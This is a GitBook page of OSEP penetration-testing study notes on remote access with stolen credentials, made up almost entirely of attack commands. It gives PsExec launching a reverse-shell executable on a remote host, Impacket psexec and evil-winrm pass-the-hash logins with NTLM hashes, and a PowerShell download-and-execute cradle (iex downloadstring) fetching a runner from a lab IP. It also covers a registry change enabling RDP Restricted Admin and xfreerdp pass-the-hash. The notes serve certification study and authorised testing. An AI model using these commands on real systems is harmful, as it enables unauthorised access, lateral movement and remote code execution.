OSEP Notes
  • Introduction
  • Useful Links, Tools & Tricks
  • OSEP
    • Metasploit Payload & Listener
      • Metasploit Useful Modules
      • Encoder
    • File Transfer & Execution
    • Phishing
    • Local Reconnaissance Windows
      • SQL Server Instance
      • Application Whitelisting & Credentials
    • Local Reconnaissance Linux
      • Ansible
    • Privilege Escalation
    • Pivoting
    • Pass the Hash
      • Remote Access
    • Post Exploitation
      • Add User
      • AMSI, CLM, & App Locker
    • Credentials
    • Lateral Movement
  • Active Directory
    • Domain Reconnaissance on Kali
    • Domain Reconnaissance on Windows
    • Active Directory Forest
Powered by GitBook
On this page
  • PsExec64
  • psexec
  1. OSEP
  2. Pass the Hash

Remote Access

PsExec64

  • Local SYSTEM

paexec.exe -s -i cmd

  • Remote Login

.\PsExec64.exe -accepteula \\file01.domain.COM C:\reverse-shell.exe

psexec

python3 impacket/examples/psexec.py -hashes :052e763020c5da81d4085a05e69b0f1b [RED/]pete@192.168.y.z

python3 impacket/example/psexec.py -k -no-pass da@reddc.red.com cmd

WinRM

evil-winrm -i 172.16.y.z -u [red.com\\]jim -p Passw0rd

evil-winrm -i 192.168.y.z -u kevin -H [hash]

invoke-command -computername redwebaw.red.com -scriptblock {cmd /c "powershell -exec  bypass -nop iex (new-object net.webclient).downloadstring('http://192.168.x.y/runner64.txt')"}

RDP

  • Password Authentication

xfreerdp /u:Administrator /p:lab [/d:red.com] /cert:ignore  //v:192.168.y.z/dynamic-resolution

  • PTH

New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name DisableRestrictedAdmin -Value 0

xfreerdp /v:192.168.y.z /u:bill /pth:[hash] /d:red.com /dynamic-resolution
PreviousPass the HashNextPost Exploitation

Last updated 1 year ago